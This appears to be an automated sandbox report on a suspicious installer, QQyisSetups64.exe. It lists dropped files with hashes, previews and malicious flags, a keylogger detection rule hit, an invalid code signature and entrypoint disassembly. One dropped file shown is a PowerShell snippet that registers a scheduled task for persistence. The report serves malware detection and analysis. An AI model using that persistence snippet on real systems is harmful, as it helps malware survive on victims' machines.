                                                                                                                                                                                                                    SSDEEP:384:QTbAFSIp6FghLfaAEYlYifrkou/Z1DTn8O5zV7qh:QTkoIp68SW1Tk1Z1P8O5zch
                                                                                                                                                                                                                    MD5:10AF715DFB97B8A187F81555C8E6068B
                                                                                                                                                                                                                    SHA1:C108E08D53A6EC711F1BA70FDBD7561CE483CBCD
                                                                                                                                                                                                                    SHA-256:EE7F804A1C73B6D6935FF731AE87AEFBBD1ABE16DC5FF315C5D8D91E283C902D
                                                                                                                                                                                                                    SHA-512:FDCA596438FDD60C88DE69367ABC70D6CBFF318D8381EB4155FA257690F26D95C9A13131F676654BED27BE458A6DF67CBE1D713DE9826CF955723F6A92FC5BBB
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:.PNG........IHDR...\...|.....-..)...>PLTE..q..q..s....v....x..!.1.+.+.%...|..q..r!.u$.v..t..s..t..r&.v..w+.x....z..'.x..}../.y......w..z5.{..t*.{..9.}..(.~..}#.|..".#.%.*.....~>.). ...|&.1.}....{+.!.y0.B.~F.*.=..B.6.zG.6.3.C.}:.2.~R.-.'.|B..L.K.O.=.|#.yF.".R..N.X.I.._./.xZ.,.wI..1.T.5.?...X..M..H=.w.bY.j..V*u.7....tRNS..e..e.e......2....6kIDATx...k..@..`...~.P.(j.b.%...W..EX.A.,........{.7.I3Y5......D}...i...8..`..~...W.En^8.jr..+....k... w.9.s....r....\.{-./].r.Q9...9.X.O&O..~........z]&...D.T..<|..e)/^.....X..p....|..Jd!.....7o..,...WX.....rV.../...Wo.{...K.2.U.G....4H.......y9d..q!=..i\.t5....",.r.....G.r....&.*...lI.<....z\N.<L./.k*.....B...k.U\./.t......../.7...U.+(]#.@R...V.q.g.&I.i.-d...v..-.2..a.W..LY.jl.,.B_..i..y..B....Y....K....+,]...,,..6......?..l..:#.xg.-..[o...m.WH+......E\.e|....K./...Z1]J.f.vq.Z.......u...+........[O..._..-^..E^r0.{.l.+O.FK........^...3..|]z\u.......b...VW..R.n..@...*w.q
                                                                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1469440
                                                                                                                                                                                                                    Entropy (8bit):6.242110984104102
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24576:l4LEubC/9euoUCi82BbjSyM5hGfzmzJHXW+U0:UEubUo1i3eymhGfizJHK0
                                                                                                                                                                                                                    MD5:A2FF2C72E739E0CF4C73B623444CA39D
                                                                                                                                                                                                                    SHA1:FF886E63C894A20F30C136A8264CFA33D41B8331
                                                                                                                                                                                                                    SHA-256:C1EB83993C85E01EE6AE84EB6E05744FF8C3CCC02C41D09C22286E3012EF46FC
                                                                                                                                                                                                                    SHA-512:844DAB35A1625D5BF1BD814A36FB80D5670D3DFEE5CF65AD8BE53784B486DCC08898B7577A323C7C7E1E83655F861EA86C5453CFA4C3D55353D329EF3AF6320B
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                    • Filename: wyySetups64.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    • Filename: A1FsbRkm5m.exe, Detection: malicious, Browse
                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......~].:<..:<..:<...s7.<<..3D4..<..3D(.7<......2<..$n%.?<..:<...>......%<......;<..3D"..<..3D%..<..3D3.;<..$n5.;<..:<6.;<..3D0.;<..Rich:<..........................PE..L...0..\...........!.....@...$.......E.......P............................................@.................................<].......`..H-...........4..h7...........X..............................8...@............P..,............................text...f?.......@.................. ..`.rdata...=...P...>...D..............@..@.data...............................@....rsrc...H-...`......................@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1135682
                                                                                                                                                                                                                    Entropy (8bit):7.510976265913228
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:Q0+G8ZYG6xrKI/ZFfg5Vfg5nfg53x3mYiJ6YJ6MJ6MEJl:QvGJxuI/bfQVfQnfQ3x3TUbhMl
                                                                                                                                                                                                                    MD5:44C8DF596B52856EB1D3FE2E37CBDE4D
                                                                                                                                                                                                                    SHA1:4AADBEEF9DC6CD4CCAC758EBDB852915C09545DF
                                                                                                                                                                                                                    SHA-256:ECDDA2FB9EB27F1B56349E2ABFE90CE2F8741B982A3DD6D248E7D93E6B75DE2C
                                                                                                                                                                                                                    SHA-512:EA94ED1662EFD2F6D91B4D05059DFADD8F290EEDBB45433E33F3B4E3729822A40E0C63D319F2041F3F1738650219200D594CED9E36B558AFF0A494FAB53A0E47
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:PK...........Q................DPI_240_Images/PK........0PZU....%...%.......DPI_240_Images/bg_promote.png.PNG........IHDR.............\$......PLTE............U.wh......^.tz..........Ita0bL.?#.?$.A$.G'.P-.S..U0.W0.X1.Y2.Z2.[3.\3.^4._6.a6.d7.g9.j;.m<.o>.q@.tA.vB.yC.|E..G..I..J..K..L..M..N..O..Q..Q..S.pI.tK.xL.uJ.wJ.yK.zL.|M.}N..O..M..O.}L.{J.zJ.tH.vI.yJ.|L.}MD.@..=..?..A..E.G.A.H.-.dG.{[..9.n'.^8.f).Z"{R..O..Q..R..T..W..Y..\".^#.a&.d(.g*.k..o...............3&.5'.6(.9*.=).9(.9%.<&.=".9..5..1..-..&.....R3.W5.R3.Z6.\9._;.a=.c>.e?.f@.hA.jB.lC.nE.pE.rF.tG.uG.wH(.;<..._C.dD.iF.lJ.qL.uN.xO.|Q..R..T..V..X..U..R..P..L..K..V..X..Z..[..].._..a.h@.d;.k?.pB.uEq.........>jW(U?.F/.R>.VA.ZB.\E.`F.dG.fI.iJ.egF..%.........}.*...b...........<.~;.|9.z7.x5.w3.u1.r...U.....k.!mI+sQ...8}\...G.i......q.]R..E.&<.,4.1,.5%.9..D..J..L..L..Y.|........X.E...T.j.....a.2.^..F..1..............`..A..,..W....y0&$.....IDATx......A..P:@.A......K...$.qwx.T...[...>`...D.oW.'u...?..qy...t...,S.Y..<. M
                                                                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):28030
                                                                                                                                                                                                                    Entropy (8bit):3.581114835224513
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:E4EuXYuiODQGYuBRrNRrQRrmRrXejXvXH5CeGTNxyqIYuyLmacwrvlCX4uH3OYqm:6nOT+bO7lU51EHWkGHr
                                                                                                                                                                                                                    MD5:8074E9740A0E3CFDA172AD1983C72A05
                                                                                                                                                                                                                    SHA1:B6D006ADAFF1FD059268517B6BD5610EF15D3BA9
                                                                                                                                                                                                                    SHA-256:E4ED337A562AAC81005D451CFD4AEF721CF067ECBC6D1057601AEFC41EE83E26
                                                                                                                                                                                                                    SHA-512:F6680CF19B512060B6ED1C0F88C8EE31A1BE456A37204CB63073E0AC58A2B0F544DCC0DABF0829F28687C2842043D21D41B2F172CB15698316EBF0F2BC89C445
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.t.h.e.m.e.s.>.......<.w.i.n.d.o.w.>.........<.d.e.f.a.u.l.t. .i.c.o.n._.p.o.i.n.t.=.".4.,.4.". .s.h.o.w._.i.c.o.n.=.".0.".>...........<.c.a.n.v.a.s. .n.o.r.m.a.l.=.".0.x.f.f.2.a.b.f.1.d.". .f.i.l.l.=.".0.". .i.m.a.g.e.=.".../.N.e.w.I.n.s.t.a.l.l.A.i.r./.s.k.i.n...p.n.g."./.>...........<.b.o.r.d.e.r. .n.o.r.m.a.l.=.".0.x.f.f.6.3.8.c.3.9.". .w.i.d.t.h.=.".1.". .i.n.n.e.r.=.".0.x.f.f.f.f.f.f.f.f."./.>...........<.f.o.n.t. .b.i.n.d._.f.o.n.t._.b.y._.l.a.n.g.u.a.g.e.=.".0.". .r.e.f.=.".". .f.a.c.e.=.".._o...,..[SO,.T.a.h.o.m.a.". .c.o.l.o.r.=.".0.x.0.0.b.5.e.5.1.3.". .s.i.z.e.=.".8.". .b.o.l.d.=.".0.". .i.t.a.l.i.c.=.".0.". .u.n.d.e.r.l.i.n.e.=.".0."./.>...........<.s.h.a.d.o.w. .b.o.r.d.e.r.=.".5.,.3.,.5.,.7.". .i.m.a.g.e.=.".../.N.e.w.I.n.s.t.a.l.l.A.i.r./.w.i.n.d.o.w._.s.h.a.d.o.w...p.n.g."./.>...........<.c.a.p.t.i.o.n. .s.h.o.w.=.".1.". .h.e.i.g.h.t.=.".3.0.". .c.o.l.o.r.=.".0.x.f.f.2.c.a.6.d.3."./.
                                                                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                                                                    File Type:Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1346052
                                                                                                                                                                                                                    Entropy (8bit):7.9989996832434676
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:24576:S25OCGNlwNr5PL8MqxJTFl9YioVgxuz4Z0dTeLieM1V9QPjQw:B0N2NFL8VB9iiL0dTeOt23
                                                                                                                                                                                                                    MD5:4F688C8A30E46A14A868F07E283763F2
                                                                                                                                                                                                                    SHA1:BA736A93EF1F07B1C7C24F4201B632F1CB18E73A
                                                                                                                                                                                                                    SHA-256:AA02BD7AB8BBF1C1AB138C20D0D7EBB6B5F2E2166E2184405E54D619526E9AC8
                                                                                                                                                                                                                    SHA-512:8A1F679BFA7A1D5667FAC931EF9184CBE76E30C26ED1A63E97CE4AFD8815DC1409EDB560EE91FD3DB57AA0BE10D6C567F43FE887440A09897DE09CD8DC7BA88A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:MSCF............,.......................Q....l........~Q.. .sites.dll.~m...l....cV.V .themes\theme_NewInstallAir.xml.BT..~.....cV.V .themes\NewInstallAir\NewInstallAir.ui..e..BJ..CK..|T..8z..IrH...L`.A..5....8Q..e.0.......4.T1.....'..v..-...V?.Wm...Uk..g2..Bx)...j.L..0..9w.}......w..w..{....k....k....y.nb...p..4.ie..r...?..0....9a.V.x.....p,.}..........<.h...C...#...q.-(u....]7qb....|..n.y.?.{j.-.9.t.e._F.....s..;.o...+..e.............._.........Gn..[sn6.e.g...V#..j.'.a..8&.y~I,.S.4+...LJf.'O..[.F....).w....ubOf.T...}S!;...D......."......J1.Ma..5...l.T......<....E.._.U..al.....w.......<..H...r......v.............1..o.uz1.......... ./...vE..N..mf...8.Bx..-{.....y.....)....o......z./.....mr.S,-#...9.....]..U....,r.w$`.lH^.R...po...o....8(..6...]..L$. [.~.%...J.V.....).v.s....5..vHu.t....c..z->..y.b..../%..yN+..O.>.ST.."!. dE.T..X..Y.w?........n.Y.-.....:..ZH.}.+..l..-..10..J.bk......~..O.<.k!{.6!Rx..2.8i@[.....S/C....=..:.z..............@....>.
                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\QQyisSetups64.exe
                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):151
                                                                                                                                                                                                                    Entropy (8bit):4.741657013789009
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                                                                                                                                                    MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                                                                                                                                                    SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                                                                                                                                                    SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                                                                                                                                                    SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\QQyisSetups64.exe
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):3400
                                                                                                                                                                                                                    Entropy (8bit):5.50401446851541
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:LbfkSFdMfkMFv3kZFdM3krFMM3krFMM3krF3:/fkSF2fkMFv3kZF23krF13krF13krF3
                                                                                                                                                                                                                    MD5:63CAEB8F90F424E56589996FF2091F68
                                                                                                                                                                                                                    SHA1:C14096FEF17EE1CF6119809034559BFAE68CD208
                                                                                                                                                                                                                    SHA-256:D791441B57E17A290CEABCB0766CA7880C5E079E157CC65443B31A8BC14A2918
                                                                                                                                                                                                                    SHA-512:73A98BC2D79CBE171040F38E5D525FA2A7DFB3BB71E6CBB8C72FF0D906365F63D23DC5EC6D8BAE2A829B196F9269D3C3AB3A4B8B05CFC44FB08FFE444C510F09
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:----------Raised Exception--------------29/12/2024 05:18:12.864----------------..Exception PID=7892 TID=7896 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:48CB03,9FE6A,F3E,664F78,D97AE,C1A6,771AFA27,757B5C,29)......----------Exception---------------------29/12/2024 05:18:12.864----------------..Exception Code=0x0EEDFADE Flags=0x1 Addr=0x7660CC12 PID=7892 TID=7896 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:7660CC12,0048CB03*2,9FE6A,F3E,664F78,D97AE,C1A6,771AFA27,757B5C,29)....----------Raised Exception--------------29/12/2024 05:18:12.864----------------..Exception PID=7892 TID=7896 [Main Thread] Build=5157....Failed to access Agent registry settings, while trying to open "SOFTWARE\Xoreax\Incredibuild" key.
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\QQyisSetups64.exe
                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):5289240
                                                                                                                                                                                                                    Entropy (8bit):7.236599313454909
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:98304:GgF0ET9HlrxRVwJMACNiREvBvlvwvCvxvq:pZ9HhxRVwJMAqoetRqA9q
                                                                                                                                                                                                                    MD5:B4F00FBA3327488D4CB6FD36B2D567C6
                                                                                                                                                                                                                    SHA1:4F0548A2F6BF73A85FF17F40F420098019AC05FF
                                                                                                                                                                                                                    SHA-256:D6A84954E038DDF4A0026705E0942FC003CFDC04E58F658A6BD9E89C37C57D18
                                                                                                                                                                                                                    SHA-512:C573147ADFEBA7D313CC79498A1C107679F0E69805E3AA8260B3E57DBA282088BCA082536D7866D4708529BF8C3BEF56B2005BD9D59A870E3D29132F6FD3D897
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe, Author: Joe Security
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....R.d..................-...".....D.-.......-...@...........................Q......BQ..........@............................/..?....2.`.............P..)..../.............................../....................../..............................text.....-.......-................. ..`.itext..P.....-.......-............. ..`.data...x.....-.......-.............@....bss.....................................idata...?..../..@..................@....tls........../..........................rdata......../.....................@..@.reloc......../......./.............@..B.rsrc...`.....2.......1.............@..@..............Q.......P.............@..@................................................................................................
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\QQyisSetups64.exe
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\QQyisSetups64.exe
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):3372
                                                                                                                                                                                                                    Entropy (8bit):5.503297144902477
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:LWfkSFfHfkMFi3kPFfH3kxFeH3kxFeH3kxF3:yfkSF/fkMFi3kPF/3kxF83kxF83kxF3
                                                                                                                                                                                                                    MD5:81D736CF61729F9EF9D17D1DEF998A43
                                                                                                                                                                                                                    SHA1:6EBF8913CE90A283AC59CA9C5DEFCA135F6D500F
                                                                                                                                                                                                                    SHA-256:6A6556E81134A1BBB09EF3278012B72DAAD469B2A4BB22F7B8DD39CF57D9CEEF
                                                                                                                                                                                                                    SHA-512:77A52D175865D6F6D7D14ED27948D3C7A192BD24C02F9AB54A83EF2020FFE3168FCDC8F254A3AF45D85A2FEDC694E34EB8DC9DB26A1E660D0F19F71C8F2A7682
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:----------Raised Exception--------------29/12/2024 05:18:09.398----------------..Exception PID=7736 TID=7740 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:48CB03,9FE6A,F3E,664F78,D97AE,C1A6,771AFA27,757B5C,29)......----------Exception---------------------29/12/2024 05:18:09.398----------------..Exception Code=0x0EEDFADE Flags=0x1 Addr=0x7660CC12 PID=7736 TID=7740 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:7660CC12,0048CB03*2,9FE6A,F3E,664F78,D97AE,C1A6,771AFA27,757B5C,29)....----------Raised Exception--------------29/12/2024 05:18:09.398----------------..Exception PID=7736 TID=7740 [Main Thread] Build=5157....Failed to access Agent registry settings, while trying to open "SOFTWARE\Xoreax\Incredibuild" key.
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\QQyisSetups64.exe
                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                    Size (bytes):4118496
                                                                                                                                                                                                                    Entropy (8bit):7.743814085153487
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
                                                                                                                                                                                                                    MD5:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                                                                    SHA1:6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
                                                                                                                                                                                                                    SHA-256:B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                                                                                                                                                                                                    SHA-512:D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..e..e..e....A.a..l.B.y..Bb..d..l.^.s..{.S.a..Bb..f..Bb..@..e.....l.T...l.S...{.C.d..l.F.d..Riche..................PE..L...,D.f......................2...................@...........................?......?...@.....................................|.......l</...........>.H)...@>.h...@...................................@............................................text............................... ..`.rdata...M.......N..................@..@.data...L....0......................@....rsrc...l</......>/.................@..@.reloc..(....@>.......=.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):55
                                                                                                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\QQyisSetups64.exe
                                                                                                                                                                                                                    File Type:GLS_BINARY_LSB_FIRST
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):4701
                                                                                                                                                                                                                    Entropy (8bit):7.79237311949855
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:XbWzUklw93FEuO9oZ2uO9wqumQRE+4J9nio2bCa+atNmkIbHipri:XboUrENP9A1RXtptNmkwwi
                                                                                                                                                                                                                    MD5:9374FD947B0EA91E37B158A7FE23669F
                                                                                                                                                                                                                    SHA1:40CF2CAEB6F62C2A91B5D6DA253D156F37B8B9D9
                                                                                                                                                                                                                    SHA-256:F8BED533A9E238FE7E27ADF2B838642E123A3E5EC8C30544746EDA3316C1C38C
                                                                                                                                                                                                                    SHA-512:843AF4E051DB4E2771B3DB76CFFB8BA94069DB456CF426EDBC66A1A0F20AAD51FAA9C8526DFA31DD9BCB7262A03C352AD67DFCF7676AA91E839B3B3794950414
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:..........=.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............4.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ....s..T.".x)Oii.d+.................P........Jd .i..../#/9..W...W ...p..Z....x|......'./..T$+3...)=....iD...A.(..6..1..i............S.<.......................\.......l7.t-eC..Z .B|../Y..@.E.[M..Z.Q.......E..3L..H.V.%......0.F........y.N.D.........p.E...Ej..wU....(a.......M.f.0a...........0wVf.<.l.~Hf :..........n..UC....>>....[wO.N.$a.n%i..).R...p.....[iZ .y6m...K.K..+.|rX.e...D.b...R.].$......`"z.>c...[.&........y9w....*.gZ.?K...L.....Y....E......<.....w..*.^....a.a._..P....yI@R0,....i'..N....#.{.Z..7:........tR.S...K-L..P.SHy............~de.L...+..N..=L.4.............%MGY....cG.w`[`{i.]..._.....9.D.q.U..t\.w.[........T..X...Z."...a.eL..1.....Z.\./.#.Pd..%..$...@..A).rdu.
                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                    Entropy (8bit):7.236599313454909
                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 98.44%
                                                                                                                                                                                                                    • Inno Setup installer (109748/4) 1.08%
                                                                                                                                                                                                                    • InstallShield setup (43055/19) 0.42%
                                                                                                                                                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                    File name:QQyisSetups64.exe
                                                                                                                                                                                                                    File size:5'289'240 bytes
                                                                                                                                                                                                                    MD5:b4f00fba3327488d4cb6fd36b2d567c6
                                                                                                                                                                                                                    SHA1:4f0548a2f6bf73a85ff17f40f420098019ac05ff
                                                                                                                                                                                                                    SHA256:d6a84954e038ddf4a0026705e0942fc003cfdc04e58f658a6bd9e89c37c57d18
                                                                                                                                                                                                                    SHA512:c573147adfeba7d313cc79498a1c107679f0e69805e3aa8260b3e57dba282088bca082536d7866d4708529bf8c3bef56b2005bd9d59a870e3d29132f6fd3d897
                                                                                                                                                                                                                    SSDEEP:98304:GgF0ET9HlrxRVwJMACNiREvBvlvwvCvxvq:pZ9HhxRVwJMAqoetRqA9q
                                                                                                                                                                                                                    TLSH:4E36CFA0B642C822C1631678DD1B97F5B975BF315F641893BAF53E0C3E3E5623828297
                                                                                                                                                                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                                                    Icon Hash:dd9d5b5252b5b513
                                                                                                                                                                                                                    Entrypoint:0x6dc144
                                                                                                                                                                                                                    Entrypoint Section:.itext
                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                    DLL Characteristics:
                                                                                                                                                                                                                    Time Stamp:0x64C252F8 [Thu Jul 27 11:20:24 2023 UTC]
                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                    Import Hash:07af52ac52c26a20d4efc068ff8bb754
                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                    Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                    • 17/07/2022 20:00:00 17/07/2024 19:59:59
                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                    • CN=Incredibuild Software Ltd., O=Incredibuild Software Ltd., S=Tel Aviv, C=IL
                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                    Thumbprint MD5:8164525B12F9B6829CCD5054865F2D41
                                                                                                                                                                                                                    Thumbprint SHA-1:583F01EE72450A9945FB1CFA539BAAB983D3F1D9
                                                                                                                                                                                                                    Thumbprint SHA-256:2EBD549CFBD28201F8773F370E920A21BB010F577BA74B4726332D2CE7836F69
                                                                                                                                                                                                                    Serial:7098774ED29B0565AB114EF2F2871CF7
                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                    add esp, FFFFFFF0h
                                                                                                                                                                                                                    mov eax, 006D9A34h
                                                                                                                                                                                                                    call 00007F0DD12CEC29h
                                                                                                                                                                                                                    call 00007F0DD15A0350h
                                                                                                                                                                                                                    mov edx, 006F8295h
                                                                                                                                                                                                                    mov eax, 006F8294h
